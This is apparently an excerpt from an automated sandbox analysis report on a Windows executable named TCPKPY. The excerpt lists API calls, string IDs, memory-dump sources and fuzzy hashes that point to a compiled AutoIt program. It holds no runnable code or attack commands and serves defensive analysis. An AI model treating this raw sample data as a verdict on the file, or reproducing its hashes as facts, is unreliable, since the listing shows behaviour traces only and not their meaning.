                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0023E6E1
                                                                                                                • _wcscmp.LIBCMT ref: 0023E6F2
                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0023E71A
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0023E737
                                                                                                                • _wcscmp.LIBCMT ref: 0023E755
                                                                                                                • _wcsstr.LIBCMT ref: 0023E766
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0023E79E
                                                                                                                • _wcscmp.LIBCMT ref: 0023E7AE
                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0023E7D5
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0023E81E
                                                                                                                • _wcscmp.LIBCMT ref: 0023E82E
                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0023E856
                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 0023E8BF
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                • Opcode ID: 516f9f106e4761d2e96bb6d1d09d4d114d2c4aa5597fb24376e4a6eb31914541
                                                                                                                • Instruction ID: 8e7361fc897c7f17b3f027d96f58674697f0820ed656a7171b46f47850d8bf46
                                                                                                                • Opcode Fuzzy Hash: 516f9f106e4761d2e96bb6d1d09d4d114d2c4aa5597fb24376e4a6eb31914541
                                                                                                                • Instruction Fuzzy Hash: B78190B102830AABDF05CF10D885FAA77E8EF54714F04846AFD859A0D2DB30DD69CBA1
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                • Opcode ID: 591dea1589cf09c8fc1ef5eb074312a8c028186059576dfda9260241e0af1297
                                                                                                                • Instruction ID: d674674a190f08c666ac3a26e3d54b9d2df91f440e1dfa1e72613e31c4c277c4
                                                                                                                • Opcode Fuzzy Hash: 591dea1589cf09c8fc1ef5eb074312a8c028186059576dfda9260241e0af1297
                                                                                                                • Instruction Fuzzy Hash: C231AB71A3430AEADB14EB50DD03EEE77A49F21784F610426B441710D2EBA1AF3C8E12
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000063), ref: 0023F8AB
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0023F8BD
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0023F8D4
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0023F8E9
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0023F8EF
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0023F8FF
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0023F905
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0023F926
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0023F940
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0023F949
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0023F9B4
                                                                                                                • GetDesktopWindow.USER32 ref: 0023F9BA
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0023F9C1
                                                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0023FA0D
                                                                                                                • GetClientRect.USER32(?,?), ref: 0023FA1A
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0023FA3F
                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0023FA6A
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3869813825-0
                                                                                                                • Opcode ID: 117534ac0a32e5a281a67c4a59b787cc49c78b0eb495a8fb17430afed8d7adc0
                                                                                                                • Instruction ID: 11120c3ba3ec29f2de382482ef6b15df420816bc09e4b12e5d88d4a067142ceb
                                                                                                                • Opcode Fuzzy Hash: 117534ac0a32e5a281a67c4a59b787cc49c78b0eb495a8fb17430afed8d7adc0
                                                                                                                • Instruction Fuzzy Hash: D151407590070AAFDB20DFA8EE89F6EBBF5FF04704F004529E596A25A0D774A958CF10
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00257F53
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00257F5E
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00257F69
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00257F74
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00257F7F
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00257F8A
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00257F95
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00257FA0
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00257FAB
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00257FB6
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00257FC1
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00257FCC
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00257FD7
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00257FE2
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00257FED
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00257FF8
                                                                                                                • GetCursorInfo.USER32(?), ref: 00258008
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 1808e4db669e82c55dd5ab60c1977393b24dd47283883b9085f41d035d7c9edc
                                                                                                                • Instruction ID: dd2043617cb0d77ca15da0797b043e43642445c3c8e03ebf784cf6aed23134a1
                                                                                                                • Opcode Fuzzy Hash: 1808e4db669e82c55dd5ab60c1977393b24dd47283883b9085f41d035d7c9edc
                                                                                                                • Instruction Fuzzy Hash: 96312BB0D5431AAADB109FB68C8986EBFE8FF04750F504536E50DF71C0DAB8A9048F95
APIs
• _wcscpy.LIBCMT ref: 0025026A
• _wcschr.LIBCMT ref: 00250278
• _wcscpy.LIBCMT ref: 0025028F
• _wcscat.LIBCMT ref: 0025029E
• _wcscat.LIBCMT ref: 002502BC
• _wcscpy.LIBCMT ref: 002502DD
• __wsplitpath.LIBCMT ref: 002503BA
• _wcscpy.LIBCMT ref: 002503DF
• _wcscpy.LIBCMT ref: 002503F1
• _wcscpy.LIBCMT ref: 00250406
• _wcscat.LIBCMT ref: 0025041B
• _wcscat.LIBCMT ref: 0025042D
• _wcscat.LIBCMT ref: 00250442
  • Part of subcall function 0024C890: _wcscmp.LIBCMT ref: 0024C92A
  • Part of subcall function 0024C890: __wsplitpath.LIBCMT ref: 0024C96F
  • Part of subcall function 0024C890: _wcscpy.LIBCMT ref: 0024C982
  • Part of subcall function 0024C890: _wcscat.LIBCMT ref: 0024C995
  • Part of subcall function 0024C890: __wsplitpath.LIBCMT ref: 0024C9BA
  • Part of subcall function 0024C890: _wcscat.LIBCMT ref: 0024C9D0
  • Part of subcall function 0024C890: _wcscat.LIBCMT ref: 0024C9E3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 2955681530-2806939583
• Opcode ID: 3694e1633ff48432e0430233728092e609af8c9322eab99702479c39645cc70d
• Instruction ID: 281fa4a10a73f7e671428401738dbe60121d18f4f1541efe247f08945c320d79
• Opcode Fuzzy Hash: 3694e1633ff48432e0430233728092e609af8c9322eab99702479c39645cc70d
• Instruction Fuzzy Hash: 0691A171524702AFCB20EF50DC95F9BB3E8AF94310F044859F98597292EB34EA68CF56
APIs
• _memset.LIBCMT ref: 0026CD0B
• DestroyWindow.USER32(00000000,?), ref: 0026CD83
  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0026CE04
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0026CE26
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0026CE35
• DestroyWindow.USER32(?), ref: 0026CE52
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00200000,00000000), ref: 0026CE85
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0026CEA4
• GetDesktopWindow.USER32 ref: 0026CEB9
• GetWindowRect.USER32(00000000), ref: 0026CEC0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0026CED2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0026CEEA
  • Part of subcall function 0021B155: GetWindowLongW.USER32(?,000000EB), ref: 0021B166
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: 7cd4c5371ed7ce66191f3efdac5d2292a5b107b8a3c8c80bdcf38a61c4bc47fb
• Instruction ID: f461e9e668328e13102fe551eac17863db01d1e37f40a05c1f7ee10be5d95681
• Opcode Fuzzy Hash: 7cd4c5371ed7ce66191f3efdac5d2292a5b107b8a3c8c80bdcf38a61c4bc47fb
• Instruction Fuzzy Hash: 4D71CCB116430AAFE720DF28DC49FBA3BF5EB89700F640518F985972A2D771E861CB11
APIs
  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
• DragQueryPoint.SHELL32(?,?), ref: 0026F14B
  • Part of subcall function 0026D5EE: ClientToScreen.USER32(?,?), ref: 0026D617
  • Part of subcall function 0026D5EE: GetWindowRect.USER32(?,?), ref: 0026D68D
  • Part of subcall function 0026D5EE: PtInRect.USER32(?,?,0026EB2C), ref: 0026D69D
• SendMessageW.USER32(?,000000B0,?,?), ref: 0026F1B4
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0026F1BF
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0026F1E2
• _wcscat.LIBCMT ref: 0026F212
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0026F229
• SendMessageW.USER32(?,000000B0,?,?), ref: 0026F242
• SendMessageW.USER32(?,000000B1,?,?), ref: 0026F259
• SendMessageW.USER32(?,000000B1,?,?), ref: 0026F27B
• DragFinish.SHELL32(?), ref: 0026F282
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0026F36D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 6f48ba73daac12207344c6447a19fcdd75663247fb0177e35d140a62ac45d3d5
• Instruction ID: 97e3500f9b0bf5e705693ec902a52b9730786c4ec70c68172134edec6a9e658c
• Opcode Fuzzy Hash: 6f48ba73daac12207344c6447a19fcdd75663247fb0177e35d140a62ac45d3d5
• Instruction Fuzzy Hash: 5F616C75118304AFD700EF60EC89D9BBBF8BF89750F500A1DF595921A2DB309A69CF52
APIs
• VariantInit.OLEAUT32(00000000), ref: 0024B46D
• VariantCopy.OLEAUT32(?,?), ref: 0024B476
• VariantClear.OLEAUT32(?), ref: 0024B482
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0024B561
• __swprintf.LIBCMT ref: 0024B591
• VarR8FromDec.OLEAUT32(?,?), ref: 0024B5BD
• VariantInit.OLEAUT32(?), ref: 0024B63F
• SysFreeString.OLEAUT32(00000016), ref: 0024B6D1
• VariantClear.OLEAUT32(?), ref: 0024B727
• VariantClear.OLEAUT32(?), ref: 0024B736
• VariantInit.OLEAUT32(00000000), ref: 0024B772
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: dee526159e6e68916bc790c19b9167631d8cd9c2ff4b7f4da95d07a8a311c964
• Instruction ID: 4a260225678cc3c6a3decbf1101a677a720dc29f3dcb7e63b06d50261d00d271
• Opcode Fuzzy Hash: dee526159e6e68916bc790c19b9167631d8cd9c2ff4b7f4da95d07a8a311c964
• Instruction Fuzzy Hash: 11C12571A20616EBCB1ADFA5D894B6AF7B5FF09300F148465E4059B192CBB0EC74DFA0
APIs
• CharUpperBuffW.USER32(?,?), ref: 00266FF9
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00267044
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 4074b1f90bb67d926658b3f19e540f872ada5c3c829867d6c51ca5002178c8e1
• Instruction ID: 3ff0be759648446a8f4a034a16d400a66340321b2316c02e503b8849949a9f13
• Opcode Fuzzy Hash: 4074b1f90bb67d926658b3f19e540f872ada5c3c829867d6c51ca5002178c8e1
• Instruction Fuzzy Hash: 3F91C4342243019FCB14EF10D851AAAB7E2AF94354F15486DF8965B3A3CB31EDAACF51
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0026E3BB
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0026BCBF), ref: 0026E417
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0026E457
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0026E49C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0026E4D3
• FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0026BCBF), ref: 0026E4DF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0026E4EF
• DestroyIcon.USER32(?,?,?,?,?,0026BCBF), ref: 0026E4FE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0026E51B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0026E527
  • Part of subcall function 00221BC7: __wcsicmp_l.LIBCMT ref: 00221C50
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 1212759294-1154884017
                                                                                                                • Opcode ID: 76546be7ddc5f797807bbf4e6e4520d394499be1550aea55ae89cc76bf128cb7
                                                                                                                • Instruction ID: 739baad921bf2b6f1bb7eff293632ca6b548bfc95ca573c22032f88425678ba9
                                                                                                                • Opcode Fuzzy Hash: 76546be7ddc5f797807bbf4e6e4520d394499be1550aea55ae89cc76bf128cb7
                                                                                                                • Instruction Fuzzy Hash: E361BE75520215BEEF24DFB4DC86FBA77A8AB08710F108205F915E61D1EBB499A4CBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 00250EFF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00250F0F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00250F1B
• __wsplitpath.LIBCMT ref: 00250F79
• _wcscat.LIBCMT ref: 00250F91
• _wcscat.LIBCMT ref: 00250FA3
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00250FB8
• SetCurrentDirectoryW.KERNEL32(?), ref: 00250FCC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00250FFE
• SetCurrentDirectoryW.KERNEL32(?), ref: 0025101F
• _wcscpy.LIBCMT ref: 0025102B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0025106A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: 595dfef8d738cc710ef82fea5fdb455abc3f80e2973e1056a126c22388428147
• Instruction ID: dff9f6318a5a61d7992a44e4b8b68c6206614b75699492770093648c7fe7eb3b
• Opcode Fuzzy Hash: 595dfef8d738cc710ef82fea5fdb455abc3f80e2973e1056a126c22388428147
• Instruction Fuzzy Hash: 2C6180B5524305AFC710EF60C885E9BB3E8FF89310F14491AF98987252EB31E959CF96
APIs
  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
• CharLowerBuffW.USER32(?,?), ref: 0024DB26
• GetDriveTypeW.KERNEL32 ref: 0024DB73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024DBBB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024DBF2
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024DC20
  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 6165295f521701847742385670a18de4a5bb183d9c2d787f29cf605454f14b2c
• Instruction ID: 2e78c9f9b6b0a420cb10083e5e56b6137c4b23f914853a5487ff66874914c26a
• Opcode Fuzzy Hash: 6165295f521701847742385670a18de4a5bb183d9c2d787f29cf605454f14b2c
• Instruction Fuzzy Hash: 5B518B71524305AFC304EF10C9818AAB3E8EF98758F50486DF895972A2DB31EE29CF52
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00274085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00243145
• LoadStringW.USER32(00000000,?,00274085,00000016), ref: 0024314E
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
• GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00274085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00243170
• LoadStringW.USER32(00000000,?,00274085,00000016), ref: 00243173
• __swprintf.LIBCMT ref: 002431B3
• __swprintf.LIBCMT ref: 002431C5
• _wprintf.LIBCMT ref: 0024326C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00243283
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: 371389b44fc29de6ca8fb37c43052c70dfcb54004a9668060fa4a5d6f3381ab2
• Instruction ID: 3b07ad5ff0e13650489d10fd5a7dfcdb09dec4012e4acd3d565b3bc3d8f47a09
• Opcode Fuzzy Hash: 371389b44fc29de6ca8fb37c43052c70dfcb54004a9668060fa4a5d6f3381ab2
• Instruction Fuzzy Hash: 65412FB1920219BADB14FBE0DD86EDF777CAF14741F500065B605B20D2DA656F28CEA1
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0024D96C
• __swprintf.LIBCMT ref: 0024D98E
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0024D9CB
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0024D9F0
• _memset.LIBCMT ref: 0024DA0F
• _wcsncpy.LIBCMT ref: 0024DA4B
• DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0024DA80
• CloseHandle.KERNEL32(00000000), ref: 0024DA8B
• RemoveDirectoryW.KERNEL32(?), ref: 0024DA94
• CloseHandle.KERNEL32(00000000), ref: 0024DA9E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 9104f6e6b422e2f0eecc5ac4cb4ae6021e02a27fccd788c9547f04e87c15b459
• Instruction ID: e305a8512754f4a51d6c8e726fcefadbaf4ce32875cbcb01fea279550947890c
• Opcode Fuzzy Hash: 9104f6e6b422e2f0eecc5ac4cb4ae6021e02a27fccd788c9547f04e87c15b459
• Instruction Fuzzy Hash: 0431C476610219BBDB20DFA4DC89FDA77BCBF84700F0085A5F519D20A1EB709A958BA1
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0026BD04,?,?), ref: 0026E564
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E57B
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E586
• CloseHandle.KERNEL32(00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E593
• GlobalLock.KERNEL32(00000000), ref: 0026E59C
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E5AB
• GlobalUnlock.KERNEL32(00000000), ref: 0026E5B4
• CloseHandle.KERNEL32(00000000,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E5BB
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0026BD04,?,?,00000000,?), ref: 0026E5CC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0028D9BC,?), ref: 0026E5E5
• GlobalFree.KERNEL32(00000000), ref: 0026E5F5
• GetObjectW.GDI32(00000000,00000018,?), ref: 0026E619
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0026E644
• DeleteObject.GDI32(00000000), ref: 0026E66C
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0026E682
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
